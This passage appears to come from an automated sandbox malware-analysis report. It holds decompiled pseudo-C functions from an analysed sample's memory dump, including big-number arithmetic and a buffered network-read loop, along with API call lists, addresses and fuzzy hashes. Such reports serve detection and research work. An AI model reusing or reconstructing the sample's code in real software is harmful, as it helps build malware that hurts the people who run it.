                                                                                                                                                                                                                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                                                                                                                                          												_v40 = _v40 + 1;
                                                                                                                                                                                                                                          												if(_v40 < _v20) {
                                                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                          												goto L16;
                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								L16:
                                                                                                                                                                                                                                          								_t65 = _v24;
                                                                                                                                                                                                                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							 *_t87(_v28);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t58 = _v32;
                                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _t118;
                                                                                                                                                                                                                                          			}





































                                                                                                                                                                                                                                          0x011291ba
                                                                                                                                                                                                                                          0x011291c3
                                                                                                                                                                                                                                          0x011291c4
                                                                                                                                                                                                                                          0x011291c8
                                                                                                                                                                                                                                          0x011291ce
                                                                                                                                                                                                                                          0x011291d4
                                                                                                                                                                                                                                          0x011291dd
                                                                                                                                                                                                                                          0x011291e3
                                                                                                                                                                                                                                          0x011291ed
                                                                                                                                                                                                                                          0x011291ef
                                                                                                                                                                                                                                          0x011291f5
                                                                                                                                                                                                                                          0x011291fa
                                                                                                                                                                                                                                          0x01129205
                                                                                                                                                                                                                                          0x0112920b
                                                                                                                                                                                                                                          0x01129210
                                                                                                                                                                                                                                          0x01129332
                                                                                                                                                                                                                                          0x01129216
                                                                                                                                                                                                                                          0x01129216
                                                                                                                                                                                                                                          0x01129223
                                                                                                                                                                                                                                          0x01129229
                                                                                                                                                                                                                                          0x0112922f
                                                                                                                                                                                                                                          0x01129233
                                                                                                                                                                                                                                          0x01129239
                                                                                                                                                                                                                                          0x01129246
                                                                                                                                                                                                                                          0x0112924a
                                                                                                                                                                                                                                          0x01129250
                                                                                                                                                                                                                                          0x01129253
                                                                                                                                                                                                                                          0x0112925b
                                                                                                                                                                                                                                          0x0112925c
                                                                                                                                                                                                                                          0x01129260
                                                                                                                                                                                                                                          0x01129264
                                                                                                                                                                                                                                          0x01129267
                                                                                                                                                                                                                                          0x0112926a
                                                                                                                                                                                                                                          0x01129270
                                                                                                                                                                                                                                          0x01129279
                                                                                                                                                                                                                                          0x0112927f
                                                                                                                                                                                                                                          0x01129280
                                                                                                                                                                                                                                          0x01129283
                                                                                                                                                                                                                                          0x01129284
                                                                                                                                                                                                                                          0x01129285
                                                                                                                                                                                                                                          0x0112928d
                                                                                                                                                                                                                                          0x0112928e
                                                                                                                                                                                                                                          0x0112928f
                                                                                                                                                                                                                                          0x01129291
                                                                                                                                                                                                                                          0x01129295
                                                                                                                                                                                                                                          0x01129299
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112929f
                                                                                                                                                                                                                                          0x011292a8
                                                                                                                                                                                                                                          0x011292ae
                                                                                                                                                                                                                                          0x011292b8
                                                                                                                                                                                                                                          0x011292bc
                                                                                                                                                                                                                                          0x011292be
                                                                                                                                                                                                                                          0x011292cb
                                                                                                                                                                                                                                          0x011292cf
                                                                                                                                                                                                                                          0x011292d7
                                                                                                                                                                                                                                          0x011292dc
                                                                                                                                                                                                                                          0x011292ee
                                                                                                                                                                                                                                          0x011292f0
                                                                                                                                                                                                                                          0x011292f6
                                                                                                                                                                                                                                          0x011292f6
                                                                                                                                                                                                                                          0x011292ff
                                                                                                                                                                                                                                          0x011292ff
                                                                                                                                                                                                                                          0x01129301
                                                                                                                                                                                                                                          0x01129307
                                                                                                                                                                                                                                          0x01129307
                                                                                                                                                                                                                                          0x0112930a
                                                                                                                                                                                                                                          0x01129310
                                                                                                                                                                                                                                          0x01129313
                                                                                                                                                                                                                                          0x0112931c
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112931c
                                                                                                                                                                                                                                          0x01129270
                                                                                                                                                                                                                                          0x0112926a
                                                                                                                                                                                                                                          0x01129253
                                                                                                                                                                                                                                          0x01129322
                                                                                                                                                                                                                                          0x01129322
                                                                                                                                                                                                                                          0x01129328
                                                                                                                                                                                                                                          0x01129328
                                                                                                                                                                                                                                          0x0112932e
                                                                                                                                                                                                                                          0x0112932e
                                                                                                                                                                                                                                          0x01129337
                                                                                                                                                                                                                                          0x0112933d
                                                                                                                                                                                                                                          0x0112933d
                                                                                                                                                                                                                                          0x011291fa
                                                                                                                                                                                                                                          0x01129346

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(0112C298), ref: 01129205
                                                                                                                                                                                                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 011292E6
                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 011292FF
                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0112932E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: String$Free$Alloclstrcmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1885612795-0
                                                                                                                                                                                                                                          • Opcode ID: ee1c1e8c1b786c9f1bcc43025b93af2f3edd1ac0c4d4eb8ea2e84b71e1b65846
                                                                                                                                                                                                                                          • Instruction ID: 4186c1dbd0bf0db3d7a802121b866ac79faa3fa03b9a910652256ed5da3d4dc6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee1c1e8c1b786c9f1bcc43025b93af2f3edd1ac0c4d4eb8ea2e84b71e1b65846
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D51A275D0012AEFCB14DFE8C8889AEB7B9FF89304F144594E915EB214D7319D42CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                                          			E01127664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                          				void _v92;
                                                                                                                                                                                                                                          				void _v236;
                                                                                                                                                                                                                                          				void* _t55;
                                                                                                                                                                                                                                          				unsigned int _t56;
                                                                                                                                                                                                                                          				signed int _t66;
                                                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                                          				signed int _t79;
                                                                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                                                                          				void* _t92;
                                                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                                                          				signed int* _t99;
                                                                                                                                                                                                                                          				signed int _t101;
                                                                                                                                                                                                                                          				signed int _t103;
                                                                                                                                                                                                                                          				void* _t107;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t92 = _a12;
                                                                                                                                                                                                                                          				_t101 = __eax;
                                                                                                                                                                                                                                          				_t55 = E011248F0(_a16, _t92);
                                                                                                                                                                                                                                          				_t79 = _t55;
                                                                                                                                                                                                                                          				if(_t79 == 0) {
                                                                                                                                                                                                                                          					L18:
                                                                                                                                                                                                                                          					return _t55;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                                                                                                                                                          				_t81 = 0;
                                                                                                                                                                                                                                          				_t96 = 0x20;
                                                                                                                                                                                                                                          				if(_t56 == 0) {
                                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                                          					_t97 = _t96 - _t81;
                                                                                                                                                                                                                                          					_v12 = _t96 - _t81;
                                                                                                                                                                                                                                          					E0112748A(_t79,  &_v236);
                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E01127074(_t101,  &_v236, _a8, _t96 - _t81);
                                                                                                                                                                                                                                          					E01127074(_t79,  &_v92, _a12, _t97);
                                                                                                                                                                                                                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                                                                                                                                                                                                          					_t66 = E0112748A(_t101, 0x112d1b0);
                                                                                                                                                                                                                                          					_t103 = _t101 - _t79;
                                                                                                                                                                                                                                          					_a8 = _t103;
                                                                                                                                                                                                                                          					if(_t103 < 0) {
                                                                                                                                                                                                                                          						L17:
                                                                                                                                                                                                                                          						E0112748A(_a16, _a4);
                                                                                                                                                                                                                                          						E01122FED(_t79,  &_v236, _a4, _t97);
                                                                                                                                                                                                                                          						memset( &_v236, 0, 0x8c);
                                                                                                                                                                                                                                          						_t55 = memset( &_v92, 0, 0x44);
                                                                                                                                                                                                                                          						goto L18;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                          						if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                          							_push(1);
                                                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                                                          							_push( *_t99);
                                                                                                                                                                                                                                          							L0112B088();
                                                                                                                                                                                                                                          							_t74 = _t66 +  *(_t99 - 4);
                                                                                                                                                                                                                                          							asm("adc edx, esi");
                                                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                                                          							_push(_v8 + 1);
                                                                                                                                                                                                                                          							_push(_t92);
                                                                                                                                                                                                                                          							_push(_t74);
                                                                                                                                                                                                                                          							L0112B082();
                                                                                                                                                                                                                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                                                                                                                                                          								_t74 = _t74 | 0xffffffff;
                                                                                                                                                                                                                                          								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_t74 =  *_t99;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                                                                                                                                                                                                          						_a12 = _t74;
                                                                                                                                                                                                                                          						_t76 = E01126FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                          							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                          							if( *_t99 != 0) {
                                                                                                                                                                                                                                          								goto L14;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							L13:
                                                                                                                                                                                                                                          							_t92 =  &_v92;
                                                                                                                                                                                                                                          							if(E011215CE(_t79, _t92, _t106) < 0) {
                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							L14:
                                                                                                                                                                                                                                          							_a12 = _a12 + 1;
                                                                                                                                                                                                                                          							_t76 = E0112687D(_t79,  &_v92, _t106, _t106);
                                                                                                                                                                                                                                          							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                          							if( *_t99 != 0) {
                                                                                                                                                                                                                                          								goto L14;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							goto L13;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_a8 = _a8 - 1;
                                                                                                                                                                                                                                          						_t66 = _a12;
                                                                                                                                                                                                                                          						_t99 = _t99 - 4;
                                                                                                                                                                                                                                          						 *(0x112d1b0 + _a8 * 4) = _t66;
                                                                                                                                                                                                                                          					} while (_a8 >= 0);
                                                                                                                                                                                                                                          					_t97 = _v12;
                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				while(_t81 < _t96) {
                                                                                                                                                                                                                                          					_t81 = _t81 + 1;
                                                                                                                                                                                                                                          					_t56 = _t56 >> 1;
                                                                                                                                                                                                                                          					if(_t56 != 0) {
                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					goto L4;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				goto L4;
                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                          0x01127667
                                                                                                                                                                                                                                          0x01127673
                                                                                                                                                                                                                                          0x01127679
                                                                                                                                                                                                                                          0x0112767e
                                                                                                                                                                                                                                          0x01127682
                                                                                                                                                                                                                                          0x011277df
                                                                                                                                                                                                                                          0x011277e3
                                                                                                                                                                                                                                          0x011277e3
                                                                                                                                                                                                                                          0x01127688
                                                                                                                                                                                                                                          0x0112768c
                                                                                                                                                                                                                                          0x01127690
                                                                                                                                                                                                                                          0x01127693
                                                                                                                                                                                                                                          0x0112769e
                                                                                                                                                                                                                                          0x011276a4
                                                                                                                                                                                                                                          0x011276a9
                                                                                                                                                                                                                                          0x011276ac
                                                                                                                                                                                                                                          0x011276c6
                                                                                                                                                                                                                                          0x011276d2
                                                                                                                                                                                                                                          0x011276db
                                                                                                                                                                                                                                          0x011276e5
                                                                                                                                                                                                                                          0x011276ea
                                                                                                                                                                                                                                          0x011276ec
                                                                                                                                                                                                                                          0x011276ef
                                                                                                                                                                                                                                          0x0112779d
                                                                                                                                                                                                                                          0x011277a3
                                                                                                                                                                                                                                          0x011277b4
                                                                                                                                                                                                                                          0x011277c7
                                                                                                                                                                                                                                          0x011277d7
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x011277dc
                                                                                                                                                                                                                                          0x011276f8
                                                                                                                                                                                                                                          0x011276ff
                                                                                                                                                                                                                                          0x01127703
                                                                                                                                                                                                                                          0x01127709
                                                                                                                                                                                                                                          0x0112770b
                                                                                                                                                                                                                                          0x0112770d
                                                                                                                                                                                                                                          0x0112770f
                                                                                                                                                                                                                                          0x01127711
                                                                                                                                                                                                                                          0x0112771b
                                                                                                                                                                                                                                          0x01127720
                                                                                                                                                                                                                                          0x01127722
                                                                                                                                                                                                                                          0x01127724
                                                                                                                                                                                                                                          0x01127725
                                                                                                                                                                                                                                          0x01127726
                                                                                                                                                                                                                                          0x01127727
                                                                                                                                                                                                                                          0x0112772e
                                                                                                                                                                                                                                          0x01127735
                                                                                                                                                                                                                                          0x01127738
                                                                                                                                                                                                                                          0x01127738
                                                                                                                                                                                                                                          0x01127705
                                                                                                                                                                                                                                          0x01127705
                                                                                                                                                                                                                                          0x01127705
                                                                                                                                                                                                                                          0x01127740
                                                                                                                                                                                                                                          0x01127748
                                                                                                                                                                                                                                          0x01127751
                                                                                                                                                                                                                                          0x01127756
                                                                                                                                                                                                                                          0x01127756
                                                                                                                                                                                                                                          0x0112775b
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112775d
                                                                                                                                                                                                                                          0x01127760
                                                                                                                                                                                                                                          0x0112776a
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112776c
                                                                                                                                                                                                                                          0x0112776c
                                                                                                                                                                                                                                          0x01127776
                                                                                                                                                                                                                                          0x01127756
                                                                                                                                                                                                                                          0x0112775b
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112775b
                                                                                                                                                                                                                                          0x01127780
                                                                                                                                                                                                                                          0x01127783
                                                                                                                                                                                                                                          0x01127786
                                                                                                                                                                                                                                          0x0112778d
                                                                                                                                                                                                                                          0x0112778d
                                                                                                                                                                                                                                          0x0112779a
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112779a
                                                                                                                                                                                                                                          0x01127695
                                                                                                                                                                                                                                          0x01127699
                                                                                                                                                                                                                                          0x0112769a
                                                                                                                                                                                                                                          0x0112769c
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112769c
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 01127711
                                                                                                                                                                                                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 01127727
                                                                                                                                                                                                                                          • memset.NTDLL ref: 011277C7
                                                                                                                                                                                                                                          • memset.NTDLL ref: 011277D7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$_allmul_aulldiv
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3041852380-0
                                                                                                                                                                                                                                          • Opcode ID: 4c8fb08a865e16f8632afc60d8e00ee3d6c989bdd9162b9e5dd67ad33b2ee40d
                                                                                                                                                                                                                                          • Instruction ID: a98c3d6237a729fbc2885bcd53a29473e5f9492e7482bc360bd47824d21345e4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c8fb08a865e16f8632afc60d8e00ee3d6c989bdd9162b9e5dd67ad33b2ee40d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D419331A00269ABDB19DFACDC44BDF7B74EF65314F108529F916A71C0EB70A964CB50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,00000008,75144D40), ref: 0112A97E
                                                                                                                                                                                                                                            • Part of subcall function 011258BE: RtlAllocateHeap.NTDLL(00000000,-00000008,01121C51), ref: 011258CA
                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(?), ref: 0112A9F2
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0112AA15
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0112AAC0
                                                                                                                                                                                                                                            • Part of subcall function 0112147E: HeapFree.KERNEL32(00000000,00000000,01121D11,00000000,?,?,-00000008), ref: 0112148A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 943265810-0
                                                                                                                                                                                                                                          • Opcode ID: f939accf7fa45967af9b2465e125b63066ce7031a5cad373b673c2bc226a1fe3
                                                                                                                                                                                                                                          • Instruction ID: 84a9e9425dacef8af9634ae3d66ac66d94a105f774fef56bd589f5242b8bc139
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f939accf7fa45967af9b2465e125b63066ce7031a5cad373b673c2bc226a1fe3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2141C371600204BFEB399FA5ED49E9B7FBEEF45700F140929F612D2890E7309564CB20
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 39%
                                                                                                                                                                                                                                          			E01128F08(void* __eax) {
                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                          				intOrPtr _t36;
                                                                                                                                                                                                                                          				intOrPtr* _t37;
                                                                                                                                                                                                                                          				intOrPtr* _t39;
                                                                                                                                                                                                                                          				void* _t53;
                                                                                                                                                                                                                                          				long _t58;
                                                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t59 = __eax;
                                                                                                                                                                                                                                          				_t58 = 0;
                                                                                                                                                                                                                                          				ResetEvent( *(__eax + 0x1c));
                                                                                                                                                                                                                                          				_push( &_v8);
                                                                                                                                                                                                                                          				_push(4);
                                                                                                                                                                                                                                          				_push( &_v20);
                                                                                                                                                                                                                                          				_push( *((intOrPtr*)(_t59 + 0x18)));
                                                                                                                                                                                                                                          				if( *0x112d138() != 0) {
                                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                                          					if(_v8 == 0) {
                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                                                                                                                                                                                                                          						L21:
                                                                                                                                                                                                                                          						return _t58;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					 *0x112d168(0, 1,  &_v12);
                                                                                                                                                                                                                                          					if(0 != 0) {
                                                                                                                                                                                                                                          						_t58 = 8;
                                                                                                                                                                                                                                          						goto L21;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t36 = E011258BE(0x1000);
                                                                                                                                                                                                                                          					_v16 = _t36;
                                                                                                                                                                                                                                          					if(_t36 == 0) {
                                                                                                                                                                                                                                          						_t58 = 8;
                                                                                                                                                                                                                                          						L18:
                                                                                                                                                                                                                                          						_t37 = _v12;
                                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                                                                                                                                                                                                                          						goto L21;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                                                          					_push(_v8);
                                                                                                                                                                                                                                          					_push( &_v20);
                                                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                                                          						_t39 = _v12;
                                                                                                                                                                                                                                          						_t56 =  *_t39;
                                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                                                                                                                                                                                                                          						ResetEvent( *(_t59 + 0x1c));
                                                                                                                                                                                                                                          						_push( &_v8);
                                                                                                                                                                                                                                          						_push(0x1000);
                                                                                                                                                                                                                                          						_push(_v16);
                                                                                                                                                                                                                                          						_push( *((intOrPtr*)(_t59 + 0x18)));
                                                                                                                                                                                                                                          						if( *0x112d138() != 0) {
                                                                                                                                                                                                                                          							goto L13;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t58 = GetLastError();
                                                                                                                                                                                                                                          						if(_t58 != 0x3e5) {
                                                                                                                                                                                                                                          							L15:
                                                                                                                                                                                                                                          							E0112147E(_v16);
                                                                                                                                                                                                                                          							if(_t58 == 0) {
                                                                                                                                                                                                                                          								_t58 = E011216DB(_v12, _t59);
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							goto L18;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t58 = E01129D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
                                                                                                                                                                                                                                          						if(_t58 != 0) {
                                                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                                                                                                                                                                                                          						if(_t58 != 0) {
                                                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						L13:
                                                                                                                                                                                                                                          						_t58 = 0;
                                                                                                                                                                                                                                          						if(_v8 == 0) {
                                                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_push(0);
                                                                                                                                                                                                                                          						_push(_v8);
                                                                                                                                                                                                                                          						_push(_v16);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t58 = GetLastError();
                                                                                                                                                                                                                                          				if(_t58 != 0x3e5) {
                                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                                          					if(_t58 != 0) {
                                                                                                                                                                                                                                          						goto L21;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					goto L5;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t58 = E01129D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
                                                                                                                                                                                                                                          				if(_t58 != 0) {
                                                                                                                                                                                                                                          					goto L21;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                                                                                                                                                                                                          				goto L4;
                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                          0x01128f17
                                                                                                                                                                                                                                          0x01128f1c
                                                                                                                                                                                                                                          0x01128f1e
                                                                                                                                                                                                                                          0x01128f23
                                                                                                                                                                                                                                          0x01128f24
                                                                                                                                                                                                                                          0x01128f29
                                                                                                                                                                                                                                          0x01128f2a
                                                                                                                                                                                                                                          0x01128f35
                                                                                                                                                                                                                                          0x01128f66
                                                                                                                                                                                                                                          0x01128f6b
                                                                                                                                                                                                                                          0x0112902e
                                                                                                                                                                                                                                          0x01129031
                                                                                                                                                                                                                                          0x01129037
                                                                                                                                                                                                                                          0x01129037
                                                                                                                                                                                                                                          0x01128f78
                                                                                                                                                                                                                                          0x01128f80
                                                                                                                                                                                                                                          0x0112902b
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112902b
                                                                                                                                                                                                                                          0x01128f8b
                                                                                                                                                                                                                                          0x01128f90
                                                                                                                                                                                                                                          0x01128f95
                                                                                                                                                                                                                                          0x0112901d
                                                                                                                                                                                                                                          0x0112901e
                                                                                                                                                                                                                                          0x0112901e
                                                                                                                                                                                                                                          0x01129024
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129024
                                                                                                                                                                                                                                          0x01128f9b
                                                                                                                                                                                                                                          0x01128f9d
                                                                                                                                                                                                                                          0x01128fa3
                                                                                                                                                                                                                                          0x01128fa4
                                                                                                                                                                                                                                          0x01128fa4
                                                                                                                                                                                                                                          0x01128fa7
                                                                                                                                                                                                                                          0x01128faa
                                                                                                                                                                                                                                          0x01128fb0
                                                                                                                                                                                                                                          0x01128fb5
                                                                                                                                                                                                                                          0x01128fb6
                                                                                                                                                                                                                                          0x01128fbb
                                                                                                                                                                                                                                          0x01128fbe
                                                                                                                                                                                                                                          0x01128fc9
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01128fd1
                                                                                                                                                                                                                                          0x01128fd9
                                                                                                                                                                                                                                          0x01129002
                                                                                                                                                                                                                                          0x01129005
                                                                                                                                                                                                                                          0x0112900c
                                                                                                                                                                                                                                          0x01129017
                                                                                                                                                                                                                                          0x01129017
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112900c
                                                                                                                                                                                                                                          0x01128fe5
                                                                                                                                                                                                                                          0x01128fe9
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01128feb
                                                                                                                                                                                                                                          0x01128ff0
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01128ff2
                                                                                                                                                                                                                                          0x01128ff2
                                                                                                                                                                                                                                          0x01128ff7
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01128ff9
                                                                                                                                                                                                                                          0x01128ffa
                                                                                                                                                                                                                                          0x01128ffd
                                                                                                                                                                                                                                          0x01128ffd
                                                                                                                                                                                                                                          0x01128fa4
                                                                                                                                                                                                                                          0x01128f3d
                                                                                                                                                                                                                                          0x01128f45
                                                                                                                                                                                                                                          0x01128f5e
                                                                                                                                                                                                                                          0x01128f60
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01128f60
                                                                                                                                                                                                                                          0x01128f51
                                                                                                                                                                                                                                          0x01128f55
                                                                                                                                                                                                                                          0x00000000
